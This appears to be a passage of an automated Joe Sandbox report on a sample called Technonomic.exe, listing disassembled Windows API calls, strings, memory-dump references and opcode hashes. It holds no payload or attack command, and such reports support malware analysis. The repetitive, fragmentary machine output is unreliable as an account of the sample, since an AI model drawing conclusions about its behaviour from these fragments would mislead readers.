                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                                      • String ID: : Completed$N$[C@$open
                                                                                                                                                                      • API String ID: 3615053054-3308546834
                                                                                                                                                                      • Opcode ID: f6016d8c67c9c4ff159701ca9c3d7a2502a484c18c0b7e2ffb0018dff941af02
                                                                                                                                                                      • Instruction ID: 197425fdc48522821a3d1a28f7e64f0f4dcf149373df3ed1280bb5b235060fa2
                                                                                                                                                                      • Opcode Fuzzy Hash: f6016d8c67c9c4ff159701ca9c3d7a2502a484c18c0b7e2ffb0018dff941af02
                                                                                                                                                                      • Instruction Fuzzy Hash: D471A4B1A00209FFDB109F60DD85E6A7B69FB84344F00453AFA05B62E0D7799D51CFA9
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrcpyW.KERNEL32(00426DE8,NUL,?,00000000,?,Error writing temporary file. Make sure your temp folder is valid.,00406045,?,?), ref: 00405EC1
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,Error writing temporary file. Make sure your temp folder is valid.,00406045,?,?), ref: 00405EE5
                                                                                                                                                                      • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00405EEE
                                                                                                                                                                        • Part of subcall function 00405CBD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CCD
                                                                                                                                                                        • Part of subcall function 00405CBD: lstrlenA.KERNEL32(00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFF
                                                                                                                                                                      • GetShortPathNameW.KERNEL32(uB,004275E8,00000400), ref: 00405F0B
                                                                                                                                                                      • wsprintfA.USER32 ref: 00405F29
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?), ref: 00405F64
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405F73
                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405FAB
                                                                                                                                                                      • SetFilePointer.KERNEL32(0040A5A8,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5A8,00000000,[Rename],00000000,00000000,00000000), ref: 00406001
                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00406012
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00406019
                                                                                                                                                                        • Part of subcall function 00405D58: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\Technonomic.exe,80000000,00000003), ref: 00405D5C
                                                                                                                                                                        • Part of subcall function 00405D58: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                                                      • String ID: %ls=%ls$Error writing temporary file. Make sure your temp folder is valid.$NUL$[Rename]$mB$uB$uB
                                                                                                                                                                      • API String ID: 222337774-3510403337
                                                                                                                                                                      • Opcode ID: e7382f7b8c26af6e0710f3cc174a3ede04313a00f8ed0edbfd428e2cb97c63d7
                                                                                                                                                                      • Instruction ID: e0a3a616164006467439f71a5ee21b177f06bf99c86c19659b49dd792d0ed9da
                                                                                                                                                                      • Opcode Fuzzy Hash: e7382f7b8c26af6e0710f3cc174a3ede04313a00f8ed0edbfd428e2cb97c63d7
                                                                                                                                                                      • Instruction Fuzzy Hash: 52312230241B157BD2206B618D09F6B3A5CEF85755F25003BFA42F62D2DA3CD9118ABD
                                                                                                                                                                      APIs
                                                                                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                      • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                      • String ID: F
                                                                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                                                                      • Opcode ID: bf2da2548cab59f56b9c29784a74930a17cbf9c8a4836dedd9ba629d6cbcfebe
                                                                                                                                                                      • Instruction ID: e4307af7b63af3c060521be2e9f36853b9854247f946bef182d968856dcca5c3
                                                                                                                                                                      • Opcode Fuzzy Hash: bf2da2548cab59f56b9c29784a74930a17cbf9c8a4836dedd9ba629d6cbcfebe
                                                                                                                                                                      • Instruction Fuzzy Hash: BB418B71800209AFCF058FA5DE459AFBBB9FF45310F00842EF991AA1A0C738DA55DFA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • CharNextW.USER32(0040A230,*?|<>/":,00000000,"C:\Users\user\Desktop\Technonomic.exe",76F93420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040647A
                                                                                                                                                                      • CharNextW.USER32(0040A230,0040A230,0040A230,00000000), ref: 00406489
                                                                                                                                                                      • CharNextW.USER32(0040A230,"C:\Users\user\Desktop\Technonomic.exe",76F93420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040648E
                                                                                                                                                                      • CharPrevW.USER32(0040A230,0040A230,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 004064A1
                                                                                                                                                                      Strings
                                                                                                                                                                      • *?|<>/":, xrefs: 00406469
                                                                                                                                                                      • "C:\Users\user\Desktop\Technonomic.exe", xrefs: 0040645B
                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00406418
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\Technonomic.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                      • API String ID: 589700163-1243461662
                                                                                                                                                                      • Opcode ID: 3926a558a1d5fac86b1a7f5ee3cbb5d374d5244e5857cfc5627c81e884b8420d
                                                                                                                                                                      • Instruction ID: 97757fea8cfc4e5e160e398f5921a23c68bb92f937fa9eb531f0d47839a376ba
                                                                                                                                                                      • Opcode Fuzzy Hash: 3926a558a1d5fac86b1a7f5ee3cbb5d374d5244e5857cfc5627c81e884b8420d
                                                                                                                                                                      • Instruction Fuzzy Hash: AE11941580171299DB307B189C80AB762F8EF94760F56843FED8AB32C0E77D5C9286BD
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 004042CB
                                                                                                                                                                      • GetSysColor.USER32(00000000), ref: 004042E7
                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 004042F3
                                                                                                                                                                      • SetBkMode.GDI32(?,?), ref: 004042FF
                                                                                                                                                                      • GetSysColor.USER32(?), ref: 00404312
                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00404322
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040433C
                                                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404346
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2320649405-0
                                                                                                                                                                      • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                                                      • Instruction ID: c8c0c82dcd415c8ab494bd2ee85d05619b55063599498dccf98d91aa8dec70c5
                                                                                                                                                                      • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                                                      • Instruction Fuzzy Hash: 9C2154B15007449BC7219F68DE08B5B7BF8AF81714F08892DFD95E26A0D734E948CB54
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                                                                                        • Part of subcall function 00405E39: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E4F
                                                                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                      • String ID: 9
                                                                                                                                                                      • API String ID: 163830602-2366072709
                                                                                                                                                                      • Opcode ID: 54eb05019f2e59d002bdcf8ef70b12416628f11d58b5efd06b79a11da1a785d5
                                                                                                                                                                      • Instruction ID: 367b42b1b2af5c2ac759aacef6cd20ad90251cc9961805460d5ea366d256a81f
                                                                                                                                                                      • Opcode Fuzzy Hash: 54eb05019f2e59d002bdcf8ef70b12416628f11d58b5efd06b79a11da1a785d5
                                                                                                                                                                      • Instruction Fuzzy Hash: 19510874D00219ABDF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99942DB69
                                                                                                                                                                      APIs
                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000), ref: 00402DBA
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402DD8
                                                                                                                                                                      • wsprintfW.USER32 ref: 00402E06
                                                                                                                                                                        • Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                                                                                        • Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                                                                                        • Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
                                                                                                                                                                        • Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
                                                                                                                                                                        • Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
                                                                                                                                                                        • Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                                                                                        • Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402E2A
                                                                                                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402E38
                                                                                                                                                                        • Part of subcall function 00402D83: MulDiv.KERNEL32(004B2F9C,00000064,004B93FC), ref: 00402D98
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                                      • String ID: ... %d%%
                                                                                                                                                                      • API String ID: 722711167-2449383134
                                                                                                                                                                      • Opcode ID: 76c6048a3b7cbdf23ef159d9fff81f0a9f13728c5e7eb0bec8d1179ea8a0becc
                                                                                                                                                                      • Instruction ID: 2b011a82625418f68b8499a5732cb5b9e1a166e3b6ac7890347db752d15f278b
                                                                                                                                                                      • Opcode Fuzzy Hash: 76c6048a3b7cbdf23ef159d9fff81f0a9f13728c5e7eb0bec8d1179ea8a0becc
                                                                                                                                                                      • Instruction Fuzzy Hash: D7015230541624E7C6216B60EE4DA9B7668AF00B05B24407BF845F11E1DAB85455CBEE
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BC7
                                                                                                                                                                      • GetMessagePos.USER32 ref: 00404BCF
                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404BE9
                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFB
                                                                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C21
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                                                                      • String ID: f
                                                                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                                                                      • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                                                      • Instruction ID: 2ee92d30c3d4f62541dcb72b74cb9552329c9a0a7836ec50a82d95606e957567
                                                                                                                                                                      • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                                                      • Instruction Fuzzy Hash: 33015E71900218BAEB10DBA4DD85FFEBBBCAF54711F10412BBA51B61D0D7B4AA058BA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                                                                                      • wsprintfW.USER32 ref: 00402D56
                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402D66
                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D78
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
